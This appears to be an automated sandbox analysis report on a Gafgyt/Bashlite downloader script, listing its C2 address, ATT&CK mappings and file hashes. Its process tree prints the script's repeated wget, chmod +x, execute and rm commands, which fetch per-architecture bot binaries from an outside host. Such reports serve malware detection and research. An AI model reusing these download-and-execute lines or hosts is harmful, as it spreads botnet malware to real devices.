Analysis

  • max time kernel
    91s
  • max time network
    93s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240729-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    25-12-2024 15:52

General

  • Target

    gtop.sh

  • Size

    2KB

  • MD5

    297b82d777e2257fda8221703403b2d3

  • SHA1

    d1ebd4f576bf89adcdf9453879c3ae2adeeb42ed

  • SHA256

    7080f56e8be79f89d154730ffb07e9d9f22bb754c6ee295548593245bc21a1af

  • SHA512

    dc0fc05650eca6bde3d5b02568e68810c61e1b6b58f5bb31f4847ef4082cd63f7aae45db042ec4e7f659615e761dcd472c6b8e20abd6e8431a3bd0c0f2ecea81

Malware Config

Extracted

Family

gafgyt

C2

154.213.186.115:4444

Signatures

  • Detected Gafgyt variant 15 IoCs
  • Gafgyt family
  • Gafgyt/Bashlite

    IoT botnet with numerous variants first seen in 2014.

  • File and Directory Permissions Modification 1 TTPs 15 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 15 IoCs
  • Reads system routing table 1 TTPs 1 IoCs

    Gets active network interfaces from /proc virtual filesystem.

  • Reads system network configuration 1 TTPs 1 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • System Network Configuration Discovery 1 TTPs 9 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 15 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/gtop.sh
    /tmp/gtop.sh
    1⤵
      PID:717
      • /usr/bin/wget
        wget http://141.95.84.4:1594/jackmymips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:719
      • /bin/chmod
        chmod +x jackmymips
        2⤵
        • File and Directory Permissions Modification
        PID:735
      • /tmp/jackmymips
        ./jackmymips
        2⤵
        • Executes dropped EXE
        • Reads system routing table
        • Reads system network configuration
        • System Network Configuration Discovery
        PID:737
      • /bin/rm
        rm -rf jackmymips
        2⤵
        • System Network Configuration Discovery
        PID:741
      • /usr/bin/wget
        wget http://141.95.84.4:1594/jackmymips64
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:743
      • /bin/chmod
        chmod +x jackmymips64
        2⤵
        • File and Directory Permissions Modification
        PID:752
      • /tmp/jackmymips64
        ./jackmymips64
        2⤵
        • Executes dropped EXE
        • System Network Configuration Discovery
        PID:753
      • /bin/rm
        rm -rf jackmymips64
        2⤵
        • System Network Configuration Discovery
        PID:755
      • /usr/bin/wget
        wget http://141.95.84.4:1594/jackmymipsel
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:756
      • /bin/chmod
        chmod +x jackmymipsel
        2⤵
        • File and Directory Permissions Modification
        PID:757
      • /tmp/jackmymipsel
        ./jackmymipsel
        2⤵
        • Executes dropped EXE
        • System Network Configuration Discovery
        PID:758
      • /bin/rm
        rm -rf jackmymipsel
        2⤵
        • System Network Configuration Discovery
        PID:760
      • /usr/bin/wget
        wget http://141.95.84.4:1594/jackmysh4
        2⤵
        • Writes file to tmp directory
        PID:761
      • /bin/chmod
        chmod +x jackmysh4
        2⤵
        • File and Directory Permissions Modification
        PID:762
      • /tmp/jackmysh4
        ./jackmysh4
        2⤵
        • Executes dropped EXE
        PID:763
      • /bin/rm
        rm -rf jackmysh4
        2⤵
          PID:766
        • /usr/bin/wget
          wget http://141.95.84.4:1594/jackmyx86
          2⤵
          • Writes file to tmp directory
          PID:768
        • /bin/chmod
          chmod +x jackmyx86
          2⤵
          • File and Directory Permissions Modification
          PID:777
        • /tmp/jackmyx86
          ./jackmyx86
          2⤵
          • Executes dropped EXE
          PID:778
        • /bin/rm
          rm -rf jackmyx86
          2⤵
            PID:781
          • /usr/bin/wget
            wget http://141.95.84.4:1594/jackmyi486
            2⤵
            • Writes file to tmp directory
            PID:783
          • /bin/chmod
            chmod +x jackmyi486
            2⤵
            • File and Directory Permissions Modification
            PID:789
          • /tmp/jackmyi486
            ./jackmyi486
            2⤵
            • Executes dropped EXE
            PID:790
          • /bin/rm
            rm -rf jackmyi486
            2⤵
              PID:793
            • /usr/bin/wget
              wget http://141.95.84.4:1594/jackmyi586
              2⤵
              • Writes file to tmp directory
              PID:795
            • /bin/chmod
              chmod +x jackmyi586
              2⤵
              • File and Directory Permissions Modification
              PID:812
            • /tmp/jackmyi586
              ./jackmyi586
              2⤵
              • Executes dropped EXE
              PID:814
            • /bin/rm
              rm -rf jackmyi586
              2⤵
                PID:818
              • /usr/bin/wget
                wget http://141.95.84.4:1594/jackmyi686
                2⤵
                • Writes file to tmp directory
                PID:819
              • /bin/chmod
                chmod +x jackmyi686
                2⤵
                • File and Directory Permissions Modification
                PID:826
              • /tmp/jackmyi686
                ./jackmyi686
                2⤵
                • Executes dropped EXE
                PID:827
              • /bin/rm
                rm -rf jackmyi686
                2⤵
                  PID:829
                • /usr/bin/wget
                  wget http://141.95.84.4:1594/jackmypowerpc
                  2⤵
                  • Writes file to tmp directory
                  PID:830
                • /bin/chmod
                  chmod +x jackmypowerpc
                  2⤵
                  • File and Directory Permissions Modification
                  PID:832
                • /tmp/jackmypowerpc
                  ./jackmypowerpc
                  2⤵
                  • Executes dropped EXE
                  PID:833
                • /bin/rm
                  rm -rf jackmypowerpc
                  2⤵
                    PID:835
                  • /usr/bin/wget
                    wget http://141.95.84.4:1594/jackmym86k
                    2⤵
                    • Writes file to tmp directory
                    PID:836
                  • /bin/chmod
                    chmod +x jackmym86k
                    2⤵
                    • File and Directory Permissions Modification
                    PID:837
                  • /tmp/jackmym86k
                    ./jackmym86k
                    2⤵
                    • Executes dropped EXE
                    PID:838
                  • /bin/rm
                    rm -rf jackmym86k
                    2⤵
                      PID:840
                    • /usr/bin/wget
                      wget http://141.95.84.4:1594/jackmysparc
                      2⤵
                      • Writes file to tmp directory
                      PID:841
                    • /bin/chmod
                      chmod +x jackmysparc
                      2⤵
                      • File and Directory Permissions Modification
                      PID:842
                    • /tmp/jackmysparc
                      ./jackmysparc
                      2⤵
                      • Executes dropped EXE
                      PID:843
                    • /bin/rm
                      rm -rf jackmysparc
                      2⤵
                        PID:845
                      • /usr/bin/wget
                        wget http://141.95.84.4:1594/jackmyarmv4
                        2⤵
                        • Writes file to tmp directory
                        PID:846
                      • /bin/chmod
                        chmod +x jackmyarmv4
                        2⤵
                        • File and Directory Permissions Modification
                        PID:847
                      • /tmp/jackmyarmv4
                        ./jackmyarmv4
                        2⤵
                        • Executes dropped EXE
                        PID:848
                      • /bin/rm
                        rm -rf jackmyarmv4
                        2⤵
                          PID:850
                        • /usr/bin/wget
                          wget http://141.95.84.4:1594/jackmyarmv4tl
                          2⤵
                          • Writes file to tmp directory
                          PID:851
                        • /bin/chmod
                          chmod +x jackmyarmv4tl
                          2⤵
                          • File and Directory Permissions Modification
                          PID:855
                        • /tmp/jackmyarmv4tl
                          ./jackmyarmv4tl
                          2⤵
                          • Executes dropped EXE
                          PID:857
                        • /bin/rm
                          rm -rf jackmyarmv4tl
                          2⤵
                            PID:859
                          • /usr/bin/wget
                            wget http://141.95.84.4:1594/jackmyarmv5
                            2⤵
                            • Writes file to tmp directory
                            PID:860
                          • /bin/chmod
                            chmod +x jackmyarmv5
                            2⤵
                            • File and Directory Permissions Modification
                            PID:867
                          • /tmp/jackmyarmv5
                            ./jackmyarmv5
                            2⤵
                            • Executes dropped EXE
                            PID:868
                          • /bin/rm
                            rm -rf jackmyarmv5
                            2⤵
                              PID:872
                            • /usr/bin/wget
                              wget http://141.95.84.4:1594/jackmyarmv6
                              2⤵
                              • Writes file to tmp directory
                              PID:873
                            • /bin/chmod
                              chmod +x jackmyarmv6
                              2⤵
                              • File and Directory Permissions Modification
                              PID:880
                            • /tmp/jackmyarmv6
                              ./jackmyarmv6
                              2⤵
                              • Executes dropped EXE
                              PID:881
                            • /bin/rm
                              rm -rf jackmyarmv6
                              2⤵
                                PID:884

                            Network

                            MITRE ATT&CK Enterprise v15

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • /tmp/jackmyarmv4

                              Filesize

                              167KB

                              MD5

                              d00be981681e272f97c7ae6e0d72a679

                              SHA1

                              76e316df4e70371cc1a0e1a718c4a148564ca13b

                              SHA256

                              2359a71e62d525ef2cc8041db19e15a51eb3201692869b7a75bd6d9977b84f08

                              SHA512

                              0ab8f509f9197c2130bb7bc36bc5de6f23d6c55a793158d1c8b2e9eff49d8b8bc69ac7edb994f78728f72de6e874af47bd7a84e36162e79dadcc0c7ba75271e0

                            • /tmp/jackmyarmv4tl

                              Filesize

                              166KB

                              MD5

                              8701802700912d0bc573d75d76bf4d30

                              SHA1

                              bcf66b86849b6c6a5977a102c67737723d9ace0d

                              SHA256

                              d338bd034f546e5756e2ebb0def390b32a13565a10e821ca8eee2eaa5468c07f

                              SHA512

                              74bd2a2a81f2dec0fa278d1aa02bfa20be97884fb7ccd2ccf4aaf2dfa07cbcc5314f7d1125c730a5209ef3abbeec7cc9e672fe32e8359522c9487f28f8bd5c7f

                            • /tmp/jackmyarmv5

                              Filesize

                              166KB

                              MD5

                              795d887687193140ee04711c54574ab5

                              SHA1

                              35ac21f15d9be9c9da1b22acefefbf466ad154f4

                              SHA256

                              f25d5d4a126acb25c26694b0d37455b757f6607a9bc33ee4a71f50b5506292a5

                              SHA512

                              5c687bcb950fae7738c4b65f67a0612f1f86338b92867deb1611b9483dfbc04b202edd158a9108be5d55350b717a64922050965e48907ff8066542eb4534c614

                            • /tmp/jackmyarmv6

                              Filesize

                              166KB

                              MD5

                              f8267e8d44d86203d2560d280b66bd36

                              SHA1

                              5a1c5e5caeacdf01af8c44bcbe1625b7ad0eb0fb

                              SHA256

                              a3360319b5713fa0352e837562c56a8fa34ff656a506763ca7e809d120e57980

                              SHA512

                              7b7398311260831b8428e76c46f31297dbfcae42c5c41c87c0644892854b0477406641bd0d5e7af03c7190a8fac38ac0c3cded5341f4f07dbfb974b8275b934e

                            • /tmp/jackmyi486

                              Filesize

                              126KB

                              MD5

                              37bc4b1d4fce9500ee4fee154e61d9e6

                              SHA1

                              6fddc8858547e60672cca66857ceb7293638a057

                              SHA256

                              72071458112606424f8eb5e064a29f4ab4016d3971da7f89e62785abeb9cbb9c

                              SHA512

                              3db6d2ed8a079792d9fc024a9e98a7cf6959ca446c4944726707c48a93775c5b40b2b9d46150a287561a4fdc6a1aa21310d8271ac521b40a733d15f07623d8eb

                            • /tmp/jackmyi586

                              Filesize

                              135KB

                              MD5

                              4ca387e1408f29f6ed1979acfb671f82

                              SHA1

                              3467879b5fd631a5884f947ba013d61ea8a33c91

                              SHA256

                              1f7ba28d9d2ea091a89b2f7e4131b76163a6dcfb696cc34b073de8c9bf8afc4d

                              SHA512

                              18995f38839a98d0d478dad4b4b000e478effd1acaea865a5e947454e1d17d296ae519556f1a30f875b505f38f298440d20ff988440457907d5dd3ae9492c738

                            • /tmp/jackmyi686

                              Filesize

                              139KB

                              MD5

                              1aeb2935aec67978bfdab8243470b577

                              SHA1

                              b26b260d86609e9c758279c59eb8caec53fd0f69

                              SHA256

                              936937cb11ad426210af65f850f4afee5713e324ad703a12d0b5f687ea84cf57

                              SHA512

                              3843063e037212bc1a60b67a69407cb466ee67d6d9935018f7fcebe5536c4be078cc797865cdfafd2f9073cec8c6425546089aee641d3788b61f4238a15748ce

                            • /tmp/jackmym86k

                              Filesize

                              155KB

                              MD5

                              a26f6fdf41bb8e4034409fb84adc83ba

                              SHA1

                              8c03a273bdd2e8f54994d0d061fe259a2968ff41

                              SHA256

                              7911664055520934019ddfa554219500fa5a038268c828a02b05aa6ad198fbbd

                              SHA512

                              dcdf2befd602bee0a56c2a05e01171cb24aada733531e479b157ccb8a6d494c3c1fcaa261b813e4eedc498bdc3ba5664e6e3b4c42ce713cfe2d5a5dcc27cb897

                            • /tmp/jackmymips

                              Filesize

                              199KB

                              MD5

                              f2ab2725ea6c883a5c608bc365c41fe5

                              SHA1

                              454d6983d9a7bb59aa0441b2c2cc805a97738e66

                              SHA256

                              531e818ee346f15e78c4f08d8de52a64597e10ce744b1be9dd2137eb1cd78c1d

                              SHA512

                              572183decc9a9ee8878e77485db9a22b6b0606e667743788eb5f5b1f8f35522505c216fe027931fa8913989053fa346b46b78c6b2209ecd53630bbc14e1d3a26

                            • /tmp/jackmymips64

                              Filesize

                              244KB

                              MD5

                              89655c0a64c3552ee71dc901a3561ad1

                              SHA1

                              8a488927882c18b5a35da06c6428f8707d4314ad

                              SHA256

                              08d4aed11bff7d311aa206396b2651f2e587e0fbe41d2688281ad4e0f6322d04

                              SHA512

                              23c581fe1ca57cc3dc9a7efeeee4d97eb5f97ac92ed3cf1f4af4e8d2caa467aa6e826a29f01a67b9dcc8609e77e76e9d23ee985f770fada89a9acab484c9af6f

                            • /tmp/jackmymipsel

                              Filesize

                              199KB

                              MD5

                              caabd697c443462f0a04d6b30529df58

                              SHA1

                              4fcb97074d1971ebfa482aad5edf208b43b6d819

                              SHA256

                              5259f289b8841e6beb9718c486210857edac40b5c206e5949fa5402b861849cf

                              SHA512

                              abf9607d8d332eca40f19ffef0866414fa353f12663c3dd232dd190954ab4f401f69cc9e84f669910c801a30df62bba8f00425aac5b1bfd99e756bdd4277a1a8

                            • /tmp/jackmypowerpc

                              Filesize

                              150KB

                              MD5

                              29f174a35d868d69945c412c159184dd

                              SHA1

                              7ac1d35bdbe15fed8443341de0875579ec8099d0

                              SHA256

                              b9966986b49c8db77d7909f17e743e4e7f6df00379a990467d62db55c69a3b7b

                              SHA512

                              6047582863aca61d2e8925f2fa6e4cc4eecdcd4095b76ea276e9489f7da1fc54503a01370f4f2f4553d144818cfa6b8324fdf772d92ecdcca57465904f012899

                            • /tmp/jackmysh4

                              Filesize

                              146KB

                              MD5

                              2a8e0da501cea8f8d32893a5fd6c9aab

                              SHA1

                              29b2be373b4155632926b9656861bebd53264473

                              SHA256

                              17f492bbf1085e3cec77c8b46831a7d2ef4662d0162377358e17296bebbb08d1

                              SHA512

                              64764a34cd7e8b7be0220519910b6f5a7e3c47340e45450e4e368515dca6c73ab3bbe11726f380533e11bc4ec840838d73a5dcc4720c93c96bb2b1444eedf6c7

                            • /tmp/jackmysparc

                              Filesize

                              167KB

                              MD5

                              8ad1c29bcb5557ee83c64f35b9b46b2e

                              SHA1

                              0fabfb4c79ff14fdacef575b3728561a8e557a77

                              SHA256

                              d44b79302f6bb77b6432c8074582a5e2df2c9d24404bc3dc17441f59e22284ca

                              SHA512

                              a3c8a68708056e0cd4aa9d5cae1c865eb381ec62f316aab48e38cdcb4ef0be3abc8daf30e4c888766211c2eaa433c7fe15e85efd3b14b35a5f3de5ab6e2ac2e6

                            • /tmp/jackmyx86

                              Filesize

                              156KB

                              MD5

                              afcb3a143b9f4e3a985c3eeb2e2ae4c8

                              SHA1

                              295f0e0380f71feb1c8911e29882db6a792bbd58

                              SHA256

                              fd0b10b636f99ee5e527b266d917c41d33230ad6bf600454e10b3e106db1031c

                              SHA512

                              b6124a40e8a5e7ff49df9b11e3b5097ac9e81b76c6146d902600f50de431e535136d22d63a34736b3fc53121ad0fa2d6b00af18b1ce834997c94c8eb288f5b08